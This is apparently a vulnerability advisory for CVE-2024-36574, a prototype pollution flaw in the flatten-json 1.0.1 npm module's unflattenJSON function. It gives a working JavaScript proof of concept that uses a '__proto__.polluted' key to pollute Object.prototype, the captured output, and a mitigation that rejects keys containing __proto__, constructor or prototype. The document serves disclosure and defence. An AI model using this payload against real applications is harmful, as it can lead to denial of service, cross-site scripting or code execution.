@mestrtee
Last active June 12, 2024 14:21
[CVE-2024-36574] Prototype pollution vulnerability affecting flatten-json, version 1.0.1 module

Overview

The vulnerability is located in module.exports.unflattenJSON (flatten-json/index.js:42), where each segment of a dotted source key is assigned onto the destination object without checking the segment name.

An attacker can exploit this method to inject a malicious payload into the built-in Object through the special properties __proto__ or constructor.prototype. Using either of these properties, the attacker can pollute application logic, which can be escalated to denial of service, remote code execution or cross-site scripting attacks depending on how the application consumes the polluted properties.

PoC

(async () => {
  const lib = await import('@allanlancioni/flatten-json');
  var victim = {};
  // victim never receives the property directly; it only inherits it.
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    // The dotted key walks into Object.prototype and sets "polluted" there.
    lib.default.unflattenJSON({ "__proto__.polluted": true });
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  // Clean up so the polluted property does not leak into later code.
  delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Output of a successful fix:

Before Attack:  {}
After Attack:  {}

How to prevent

No fix has been provided by the maintainer. Users of this module are urged to implement proper sanitization and validation of user-supplied input before it reaches unflattenJSON, such as rejecting any key whose dotted path contains __proto__, constructor or prototype.
